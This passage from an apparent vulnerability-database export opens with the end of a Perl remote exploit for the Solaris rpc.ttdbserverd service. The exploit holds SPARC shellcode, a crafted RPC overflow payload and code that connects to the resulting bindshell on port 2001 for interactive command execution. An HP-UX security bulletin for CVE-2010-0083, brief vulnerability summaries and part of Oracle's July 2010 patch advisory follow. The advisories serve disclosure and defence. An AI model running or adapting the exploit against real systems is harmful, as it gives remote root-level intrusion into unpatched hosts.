\n\"\\xd0\\x23\\xbf\\xf8\".# /* st %o0, [%sp - 8] */ \n\"\\xc0\\x23\\xbf\\xfc\".# /* st %g0, [%sp - 4] */ \n\"\\x82\\x02\\xe0\\x3b\".# /* add %o3, 59, %g1 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x90\\x1b\\x80\\x0e\".# /* xor %sp, %sp, %o0 */ \n\"\\x82\\x02\\xe0\\x01\".# /* add %o3, 1, %g1 */ \n\"\\x91\\xd0\\x38\\x08\";# /* ta 0x8 */ \n \ngetopts('h:o:f:a:',\\%args); \n \nif(defined($args{'h'})){ $host = $args{'h'}; }else{ $host = \"localhost\"; } \nif(defined($args{'o'})){ $offset = $args{'o'}; }else{ $offset = 0; } \nif(defined($args{'f'})){ $file = $args{'f'}; }else{ $file = \"/tmp/owned\"; } \nif(defined($args{'a'})){ $addr = hex($args{'a'}); }else{ $addr = 0; } \n \nprint STDERR \"-= rpc.ttdbserverd .rec parser exploit for Solaris 9/10 SPARC =-\\n\"; \nprint STDERR \"-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =-\\n\"; \nprint STDERR \"-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =-\\n\\n\"; \nprint STDERR \" Usage: [-f] /file/name [-h] hostname [-o] offset [-a] addr\\n\"; \n \n$remote = 1; \n \nif($host =~ /localhost/){ \n \n$remote = 0; \n \nif(!$addr){ \n$addr = get_thr_addr(); \n} \n} \n \n$heap = $addr - 8; # Where to write \n$pheap = pack('l',$heap); \n$stck = 0x00087080 + $offset; # Shellcode Address \n$pstck = pack('l',$stck); \n$null = $heap + 0x300; # Poiting to null \n$pnull = pack('l',$null); \n \n \n$rpcdata = # rpc.ttdbserverd is_erase procedure call \n\"\\x80\\x00\\x00\\x98\\x19\\x38\\xba\\x51\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x02\\x00\\x01\\x86\\xf3\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x00\\x00\". \n\"\\x00\\x01\\x00\\x00\\x00\\x20\\x4b\\x3b\\x63\\x40\\x00\\x00\\x00\\x09\\x6c\\x6f\". \n\"\\x63\\x61\\x6c\\x68\\x6f\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \npack('N',length($file)) . \n$file. \n\"\\x00\\x00\\x00\\x00\\x00\". \n\"\\x20\\x00\" . \"a\" x ( 5 - (length($file) % 4)). \n\"\\x10\\x80\\x00\\x03\" x (( 7596 - length($shellrise))/4). \n\"\\x80\\x1c\\x40\\x11\" x 2 . $shellrise . \"\\x00\" x 593 . \n\"\\x00\\x00\\x00\\x00\\x00\\x04\\x35\\x36\\x37\\x38\". \n\"\\x00\\x00\\x00\\x00\\x00\\x04\\x39\\x40\\x41\\x42\\x00\\x00\\x00\\x00\\x00\\x04\". \n\"\\x43\\x44\\x45\\x46\\x00\\x00\\x00\\x00\\x00\\x04\\x47\\x48\\x49\\x50\\x00\\x00\". \n\"\\x00\\x00\\x00\\x04\\x51\\x52\\x53\\x54\\x00\\x00\\x00\\x04\\x55\\x56\\x57\\x58\"; \n \n$rec = \n\"\\x4E\\x65\\x74\\x49\\x53\\x41\\x4D\\x00\\x55\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x00\". \n\"\\x31\\x2E\\x31\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x04\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x03\\x00\\x1C\\x00\\x1C\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\". \n\"\\xFF\\xFF\\xFF\\xFF\\x00\\x01\". \n\"\\x78\" x 122 . \n\"\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x0f\". \n\"\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\". \n\"\\xff\\xff\\xff\\xf0\" x 21 . \n\"\\x00\\x00\\x00\\x00\". \n\"\\xff\\xff\\xff\\xff\". \n$pstck. \n\"\\x00\\x00\\x00\\x00\". \n\"\\xff\\xff\\xff\\xff\". \n\"\\xff\\xff\\xff\\xff\". \n$pnull. \n\"\\xff\\x00\\x00\\x00\". \n$pheap. \n\"\\x44\" x 3000; \n \nif(!$remote){ \n$file = $file . \".rec\"; \nopen(F,\">$file\") or die(\"Cant create $file!\"); \nprint STDERR \"[+] Creating file \" . $file . \"\\n\"; \nprint F $rec; \nclose(F); \nprint STDERR \"[+] Writing 0x\" . sprintf('%lx',$stck) . \" to 0x\" . sprintf('%lx', $heap + 8) . \"\\n\"; \n} \n \n$port = rpc_getport($host, 111, 100083, 1); \nif(!$port){ die (\"[-] TTDB not running on target!\\n\");} \n \nprint STDERR \"[+] TTDB running on port $port\\n\"; \n \n$sock = IO::Socket::INET->new(Proto=>\"tcp\", PeerHost=>$host,PeerPort=>$port) \nor die \"[-] Cant Connect!!\\n\"; \nprint STDERR \"[+] Sending stuff to TTDB ...\"; \n#<STDIN>; \nprint $sock $rpcdata; \nprint STDERR \"d0ne!\\n\"; \n \nclose($sock); \n \nprint STDERR \"[+] Wait a little!\\n\"; \nsleep(2); \n \n$sc = IO::Socket::INET->new(Proto=>\"tcp\", PeerHost=>$host,PeerPort=>2001,Type=>SOCK_STREAM,Reuse=>1) \nor die \"[*] No luck :(\\n\\n\"; \n \nprint \"[*] We got in =)\\n\"; \n \n$sc->autoflush(1); \n \nsleep(2); \n \nprint $sc \"echo;uname -a;id;echo\\n\"; \n \ndie \"cant fork: $!\" unless defined($pid = fork()); \n \nif ($pid){ \nwhile(defined ($line = <$sc>)){ \nprint STDOUT $line; \n} \nkill(\"TERM\", $pid); \n}else{ \nwhile(defined ($line = <STDIN>)) { \nprint $sc $line; \n} \n} \n \nclose($sc); \nprint \"Good bye!!\\n\"; \n \nsub rpc_getport { \nmy ($target_host, $target_port, $prog, $vers) = @_; \n \nmy $s = rpc_socket($target_host, $target_port); \n \nmy $portmap_req = \n \npack(\"L\", rand() * 0xffffffff) . # XID \n\"\\x00\\x00\\x00\\x00\". # Call \n\"\\x00\\x00\\x00\\x02\". # RPC Version \n\"\\x00\\x01\\x86\\xa0\". # Program Number (PORTMAP) \n\"\\x00\\x00\\x00\\x02\". # Program Version (2) \n\"\\x00\\x00\\x00\\x03\". # Procedure (getport) \n(\"\\x00\" x 16). # Credentials and Verifier \npack(\"N\", $prog) . \npack(\"N\", $vers). \npack(\"N\", 0x6). # Protocol: TCP \npack(\"N\", 0x00); # Port: 0 \n \nprint $s $portmap_req; \n \nmy $r = rpc_read($s); \nclose ($s); \n \nif (length($r) == 28){ \nmy $prog_port = unpack(\"N\",substr($r, 24, 4)); \nreturn($prog_port); \n} \n \nreturn undef; \n} \n \nsub rpc_socket { \nmy ($target_host, $target_port) = @_; \nmy $s = IO::Socket::INET->new \n( \nPeerAddr => $target_host, \nPeerPort => $target_port, \nProto => \"udp\", \nType => SOCK_DGRAM \n); \n \nif (! $s){ \nprint \"\\nError: could not create socket to target: $!\\n\"; \nexit(0); \n} \n \nselect($s); $|++; \nselect(STDOUT); $|++; \nnonblock($s); \nreturn($s); \n} \n \nsub rpc_read { \nmy ($s) = @_; \nmy $sel = IO::Select->new($s); \nmy $res; \nmy @fds = $sel->can_read(4); \nforeach (@fds) { $res .= <$s>; } \nreturn $res; \n} \n \nsub nonblock { \nmy ($fd) = @_; \nmy $flags = fcntl($fd, F_GETFL,0); \nfcntl($fd, F_SETFL, $flags|O_NONBLOCK); \n} \n \nsub hexdump \n{ \nmy ($buf) = @_; \nmy ($p, $c, $pc, $str); \nmy ($i); \n \nfor ($i=0;$i<length($buf);$i++){ \n$p = substr($buf, $i, 1); \n$c = ord ($p); \nprintf \"%.2x \", $c; \n$pc++; \nif (($c > 31) && ($c < 127)){ \n$str .= $p; \n}else{ \n$str .= \".\"; \n} \nif ($pc == 16){ \nprint \" $str\\n\"; \nundef $str; \n$pc = 0; \n} \n} \nprint \" \" x (16 - $pc); \nprint \" $str \\n\"; \n} \n \nsub get_thr_addr { \n \n$cmd = `/usr/ccs/bin/dump -t /lib/ld.so.1 | grep thr_jmp_table`; \n($xx,$thr) = split(/ /,$cmd); \n \nif(!$thr){ \ndie(\"thr_jmp_table not found!\\n\"); \n} \n \n$cmd2 = `/bin/pmap $$ | grep /lib/ld.so.1`; \n($base,$yy) = split(/ /,$cmd2); \n \nif(!$base){ \ndie(\"error geting base addr\\n\"); \n} \n \n$base = hex($base); \n$thr = hex($thr); \n \nprint STDERR \"[+] Base at: 0x\" . sprintf('%lx',$base) . \"\\n\"; \nprint STDERR \"[+] thr_jmp_table at: 0x\" . sprintf('%lx',$thr) . \"\\n\"; \n \nreturn $base + $thr; \n \n} \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/92792/final_sparc.pl.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-0083"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02288473\r\nVersion: 1\r\n\r\nHPSBUX02556 SSRT100014 rev.1 - HP-UX Running rpc.ttdbserver, Remote Execution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2010-07-13\r\nLast Updated: 2010-07-13\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP-UX running rpc.ttdbserver. The vulnerability\r\ncould be exploited remotely to execute arbitrary code.\r\n\r\nReferences: CVE-2010-0083\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP-UX B.11.11, B.11.23, B.11.31 running rpc.ttdbserver\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2010-0083 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nThe vulnerability can be resolved by disabling rtp.ttdbserver.\r\n\r\nNote: The rpc.ttdbserver process is not needed for programs provided in the HP CDE product.\r\n\r\nTo Disable rpc.ttdbserver\r\n\r\nEdit /etc/inetd.conf and comment out the rpc.ttdbserver line as follows:\r\n#rpc stream tcp swait root /usr/dt/bin/rpc.ttdbserver ...\r\n\r\nRestart inetd:\r\n/usr/sbin/inetd -c\r\n\r\nKill any instances of rpc.ttdbserver that might be running.\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nDisable rpc.ttdbserver\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security\r\nPatch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a\r\nspecific HP-UX system. It can also download patches and create a depot automatically. For more information\r\nsee: https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS\r\n\r\nHP-UX B.11.11\r\nHP-UX B.11.23\r\nHP-UX B.11.31\r\n==================\r\nCDE.CDE-TT\r\naction: disable rpc.ttdbserver\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nHISTORY\r\nVersion:1 (rev.1) 13 July 2010 Initial release\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP\r\nsoftware products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP,\r\nespecially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is\r\ncontinually reviewing and enhancing the security features of software products to provide customers with\r\ncurrent secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the\r\naffected HP products the important security information contained in this Bulletin. HP recommends that all\r\nusers determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user situations\r\nand, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the\r\ninformation provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability and fitness for a particular purpose, title\r\nand non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein.\r\nThe information provided is provided "as is" without warranty of any kind. To the extent permitted by law,\r\nneither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of substitute\r\nproducts or services; or damages for loss of data, or software restoration. The information in this document\r\nis subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products\r\nreferenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other\r\nproduct and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAkw80fwACgkQ4B86/C0qfVlvXwCgnfePfI7ZTR9IjEAp1R+fJmjp\r\nwPAAnRHpaFTkEIUDJI8KP9YXp3TcE/vr\r\n=TzV6\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-07-18T00:00:00", "published": "2010-07-18T00:00:00", "id": "SECURITYVULNS:DOC:24274", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24274", "title": "[security bulletin] HPSBUX02556 SSRT100014 rev.1 - HP-UX Running rpc.ttdbserver, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-1129", "CVE-2010-1968", "CVE-2010-1965", "CVE-2010-1966", "CVE-2009-0696", "CVE-2010-2703", "CVE-2010-1973", "CVE-2010-0001", "CVE-2007-2452", "CVE-2010-1967", "CVE-2010-1969", "CVE-2010-1970", "CVE-2007-5497", "CVE-2009-0692", "CVE-2008-5110", "CVE-2010-1972", "CVE-2010-0083", "CVE-2009-1427", "CVE-2010-1971", "CVE-2010-2704"], "description": ">20 vulnerabilities in different applications are fixed.", "edition": 1, "modified": "2010-07-22T00:00:00", "published": "2010-07-22T00:00:00", "id": "SECURITYVULNS:VULN:11009", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11009", "title": "Hewlett Packard applications multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-2374", "CVE-2010-0903", "CVE-2010-0892", "CVE-2010-2386", "CVE-2010-0873", "CVE-2010-0913", "CVE-2010-0907", "CVE-2010-0906", "CVE-2010-2384", "CVE-2010-2379", "CVE-2009-0217", "CVE-2010-0902", "CVE-2010-2377", "CVE-2009-3762", "CVE-2010-2376", "CVE-2010-2372", "CVE-2010-0908", "CVE-2008-4247", "CVE-2010-0914", "CVE-2010-2385", "CVE-2010-2397", "CVE-2010-0081", "CVE-2010-2393", "CVE-2010-0898", "CVE-2010-2378", "CVE-2010-2401", "CVE-2010-0900", "CVE-2010-2398", "CVE-2009-3555", "CVE-2010-0912", "CVE-2010-0835", "CVE-2010-0915", "CVE-2009-3764", "CVE-2010-0910", "CVE-2010-0849", "CVE-2010-2381", "CVE-2010-2371", "CVE-2010-2394", "CVE-2010-2380", "CVE-2010-2403", "CVE-2010-0911", "CVE-2010-2392", "CVE-2010-0916", "CVE-2010-2383", "CVE-2010-2370", "CVE-2010-0904", "CVE-2010-2375", "CVE-2010-0909", "CVE-2010-2382", "CVE-2010-0899", "CVE-2010-0083", "CVE-2010-0905", "CVE-2010-2402", "CVE-2010-2400", "CVE-2010-0836", "CVE-2009-3763", "CVE-2010-2399", "CVE-2010-2373", "CVE-2010-0901"], "description": "Quarterly update fixed 59 different vulnerabilities.", "edition": 1, "modified": "2010-07-20T00:00:00", "published": "2010-07-20T00:00:00", "id": "SECURITYVULNS:VULN:10999", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10999", "title": "Oracle / Sun applications multiple security vulneraebilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-2374", "CVE-2010-0903", "CVE-2010-0892", "CVE-2010-2386", "CVE-2010-0873", "CVE-2010-0913", "CVE-2010-0907", "CVE-2010-0906", "CVE-2010-0088", "CVE-2010-2384", "CVE-2010-2379", "CVE-2009-0217", "CVE-2010-0085", "CVE-2010-0902", "CVE-2010-0087", "CVE-2010-2377", "CVE-2009-3762", "CVE-2010-2376", "CVE-2010-2372", "CVE-2010-0908", "CVE-2010-0092", "CVE-2008-4247", "CVE-2010-0848", "CVE-2010-0914", "CVE-2010-2385", "CVE-2010-0838", "CVE-2010-0840", "CVE-2010-0095", "CVE-2010-2397", "CVE-2010-0839", "CVE-2010-0094", "CVE-2010-0081", "CVE-2010-2393", "CVE-2010-0898", "CVE-2010-0847", "CVE-2010-2378", "CVE-2010-2401", "CVE-2010-0842", "CVE-2010-0900", "CVE-2010-2398", "CVE-2009-3555", "CVE-2010-0841", "CVE-2010-0844", "CVE-2010-0846", "CVE-2010-0912", "CVE-2010-0837", "CVE-2010-0835", "CVE-2010-0915", "CVE-2009-3764", "CVE-2010-0910", "CVE-2010-0849", "CVE-2010-2381", "CVE-2010-2371", "CVE-2010-2394", "CVE-2010-0091", "CVE-2010-2380", "CVE-2010-2403", "CVE-2010-0911", "CVE-2010-2392", "CVE-2010-0916", "CVE-2010-2383", "CVE-2010-2370", "CVE-2010-0904", "CVE-2010-2375", "CVE-2010-0909", "CVE-2010-2382", "CVE-2010-0899", "CVE-2010-0083", "CVE-2010-0905", "CVE-2010-2402", "CVE-2010-2400", "CVE-2010-0836", "CVE-2010-0843", "CVE-2009-3763", "CVE-2010-2399", "CVE-2010-0084", "CVE-2010-2373", "CVE-2010-0901"], "description": "Oracle Critical Patch Update Advisory - July 2010\r\nDescription\r\n\r\nA Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to:\r\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\r\n\r\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible. This Critical Patch Update contains 59 new security fixes across all product families listed below.\r\n\r\nOracle is in the process of aligning the Sun Microsystems policies with Oracle Software Security Assurance policies and procedures. For details, please refer to Changes in security policies for the Sun product lines.\r\nAffected Products and Components\r\n\r\nSecurity vulnerabilities addressed by this Critical Patch Update affect the products listed in the categories below. The product area of the patches for the listed versions is shown in [square brackets] following the product versions. Please click on the link in [square brackets] or in the Patch Availability Table to access the documentation for those patches.\r\n\r\nAffected product releases and versions that are in Premier Support or Extended Support, under the Oracle Lifetime Support Policy:\r\n\r\n\u2022 Oracle Database 11g Release 2, version 11.2.0.1 \t [ Database ]\r\n\u2022 Oracle Database 11g Release 1, version 11.1.0.7 \t [ Database ]\r\n\u2022 Oracle Database 10g Release 2, versions 10.2.0.3, 10.2.0.4 \t [ Database ]\r\n\u2022 Oracle Database 10g, version 10.1.0.5 \t [ Database ]\r\n\u2022 Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV \t [ Database ]\r\n\u2022 Oracle TimesTen In-Memory Database, versions 7.0.6.0, 11.2.1.4.1 \t [ Database ]\r\n\u2022 Oracle Secure Backup version 10.3.0.1 \t [ Database ]\r\n\u2022 Oracle Application Server, 10gR2, version 10.1.2.3.0 \t [ Fusion Middleware ]\r\n\u2022 Oracle Identity Management 10g, version 10.1.4.0.1 \t [ Fusion Middleware ]\r\n\u2022 Oracle WebLogic Server 11gR1 releases (10.3.1, 10.3.2 and 10.3.3) \t [ Fusion Middleware ]\r\n\u2022 Oracle WebLogic Server 10gR3 release (10.3.0) \t [ Fusion Middleware ]\r\n\u2022 Oracle WebLogic Server 10.0 through MP2 \t [ Fusion Middleware ]\r\n\u2022 Oracle WebLogic Server 9.0, 9.1, 9.2 through MP3 \t [ Fusion Middleware ]\r\n\u2022 Oracle WebLogic Server 8.1 through SP6 \t [ Fusion Middleware ]\r\n\u2022 Oracle WebLogic Server 7.0 through SP7 \t [ Fusion Middleware ]\r\n\u2022 Oracle JRockit R28.0.0 and earlier (JDK/JRE 5 and 6) \t [ Fusion Middleware ]\r\n\u2022 Oracle JRockit R27.6.6 and earlier (JDK/JRE 1.4.2, 5 and 6) \t [ Fusion Middleware ]\r\n\u2022 Oracle Business Process Management, versions 5.7.3, 6.0.5, 10.3.1, 10.3.2 \t [ Fusion Middleware ]\r\n\u2022 Oracle Enterprise Manager Grid Control 10g Release 5, version 10.2.0.5 \t [ Enterprise Manager ]\r\n\u2022 Oracle Enterprise Manager Grid Control 10g Release 1, version 10.1.0.6 \t [ Enterprise Manager ]\r\n\u2022 Oracle E-Business Suite Release 12, versions 12.0.4, 12.0.5, 12.0.6, 12.1.1 and 12.1.2 \t [ E-Business Suite ]\r\n\u2022 Oracle E-Business Suite Release 11i, versions 11.5.10, 11.5.10.2 \t [ E-Business Suite ]\r\n\u2022 Oracle Transportation Manager, Versions: 5.5.05.07, 5.5.06.00, 6.0.03 \t [ Oracle Transportation Management ]\r\n\u2022 PeopleSoft Enterprise Campus Solutions, version 9.0 \t [ PeopleSoft ]\r\n\u2022 PeopleSoft Enterprise CRM, versions 9.0 and 9.1 \t [ PeopleSoft ]\r\n\u2022 PeopleSoft Enterprise FSCM, versions 8.9, 9.0 and 9.1 \t [ PeopleSoft ]\r\n\u2022 PeopleSoft Enterprise HCM, versions 8.9, 9.0 and 9.1 \t [ PeopleSoft ]\r\n\u2022 PeopleSoft Enterprise PeopleTools, versions 8.49 and 8.50 \t [ PeopleSoft ]\r\n\u2022 Oracle Sun Product Suite \t [ Oracle Sun Product Suite ]\r\n\r\n\r\nPatch Availability Table and Risk Matrices\r\nProducts with Cumulative Patches\r\n\r\nStarting with the January 2010 CPU, Oracle E-Business Suite Release 11.5.10 CU2 patches are cumulative. For more information, please see Oracle E-Business Suite Critical Patch Update Note for July 2010.\r\n\r\nThe Oracle Database, Oracle Fusion Middleware, Oracle Enterprise Manager Grid Control, Oracle E-Business Suite Applications (Releases 11.5.10 CU2, 12.0 and 12.1), JD Edwards EnterpriseOne, JD Edwards OneWorld Tools, PeopleSoft Enterprise Portal Applications, PeopleSoft Enterprise PeopleTools and Siebel Enterprise, and Oracle Industry Applications patches in the Updates are cumulative; patches for any of these products included in a Critical Patch Update will include all fixes for that product from the previous Critical Patch Updates.\r\nProducts with Non-Cumulative Patches\r\n\r\nOracle E-Business Suite Applications Release 11.5.10 patches are not cumulative, so Oracle E-Business Suite Applications customers should refer to previous Critical Patch Updates to identify previous security fixes they want to apply. Oracle Collaboration Suite patches were cumulative up to and including the fixes provided in the July 2007 Critical Patch Update. From the October 2007 Critical Patch Update on, Oracle Collaboration Suite security fixes are delivered using the one-off patch infrastructure normally used by Oracle to deliver single bug fixes to customers.\r\n\r\nFor each administered Oracle product, consult the documentation for patch availability information and installation instructions referenced from the following table. For an overview of the Oracle product documentation related to this Critical Patch Update, please refer to the Oracle Critical Patch Update July 2010 Documentation Map, My Oracle Support Note 1128882.1.\r\nProduct Group \tRisk Matrix \tPatch Availability and Installation Information\r\nOracle Database \tAppendix - Oracle Database Risk Matrix \tCritical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1\r\nOracle Fusion Middleware \tAppendix - Oracle Fusion Middleware Risk Matrix \tCritical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1\r\nOracle Enterprise Manager \tAppendix - Oracle Enterprise Manager Risk Matrix \tCritical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1\r\nOracle Applications - E-Business Suite \tAppendix - Oracle Applications, E-Business Risk Matrix \tOracle E-Business Suite Critical Patch Update Note for July 2010, My Oracle Support Note 986534.1\r\nOracle Applications - Oracle PeopleSoft Enterprise and Oracle Supply Chain Product Suite \tAppendix - Oracle Applications, PeopleSoft and Oracle Supply Chain Products Risk Matrix \tCritical Patch Update Knowledge Document for PeopleSoft Enterprise, JD Edwards EnterpriseOne, Siebel and Oracle Supply Chain Suite Products, My Oracle Support Note 1127913.1\r\nOracle Sun Product Suite \tAppendix - Oracle Sun Products Suite Risk Matrix \tCritical Patch Update July 2010 Patch Delivery Document for Oracle Sun Product Suite\r\n\r\n\r\nRisk Matrix Content\r\n\r\nRisk matrices list only security vulnerabilities that are newly fixed by the patches associated with this advisory. Risk matrices for previous security fixes can be found in previous Critical Patch Update advisories.\r\n\r\nSeveral vulnerabilities addressed in this Critical Patch Update affect multiple products. A vulnerability that affects multiple products will appear with the same CVE# in all risk matrices. Italics indicate vulnerabilities in code included from other product areas.\r\n\r\nSecurity vulnerabilities are scored using CVSS version 2.0 (see Oracle CVSS Scoring for an explanation of how Oracle applies CVSS 2.0). Oracle conducts an analysis of each security vulnerability addressed by a Critical Patch Update (CPU). Oracle does not disclose information about the security analysis, but the resulting Risk Matrix and associated documentation provide information about the type of vulnerability, the conditions required to exploit it, and the potential result of a successful exploit. Oracle provides this information, in part, so that customers may conduct their own risk analysis based on the particulars of their product usage. As a matter of policy, Oracle does not disclose detailed information about an exploit condition or results that can be used to conduct a successful exploit. Oracle will not provide additional information about the specifics of vulnerabilities beyond what is provided in the CPU or Security Alert notification, the Patch Availability Matrix, the readme files, and FAQs. Oracle does not provide advance notification on CPUs or Security Alerts to individual customers. Finally, Oracle does not distribute exploit code or \u201cproof-of-concept\u201d code for product vulnerabilities.\r\nWorkarounds\r\n\r\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible. Until you apply the CPU fixes, it may be possible to reduce the risk of successful attack by restricting network protocols required by an attack. For attacks that require certain privileges or access to certain packages, removing the privileges or the ability to access the packages from users that do not need the privileges may help reduce the risk of successful attack. Both approaches may break application functionality, so Oracle strongly recommends that customers test changes on non-production systems. Neither approach should be considered a long-term solution as neither corrects the underlying problem.\r\nSkipped Critical Patch Updates\r\n\r\nOracle strongly recommends that customers apply security fixes as soon as possible. For customers that have skipped one or more Critical Patch Updates and are concerned about products that do not have security fixes announced in this CPU, please review previous Critical Patch Update advisories to determine appropriate actions.\r\nProduct Dependencies\r\n\r\nOracle products may have dependencies on other Oracle products. Hence security vulnerability fixes announced in this Critical Patch Update may affect one or more dependent Oracle products. For details regarding these dependencies and to apply patches to dependent products, please refer to Critical Patch Update July 2010 Patch Availability Document for Oracle Products.\r\nUnsupported Products and Versions\r\n\r\nOracle recommends that customers upgrade their Oracle products to a supported version. Unsupported products, releases and versions are not tested for the presence of vulnerabilities addressed by this Critical Patch Update. However, it is likely that earlier versions of affected releases are also affected by 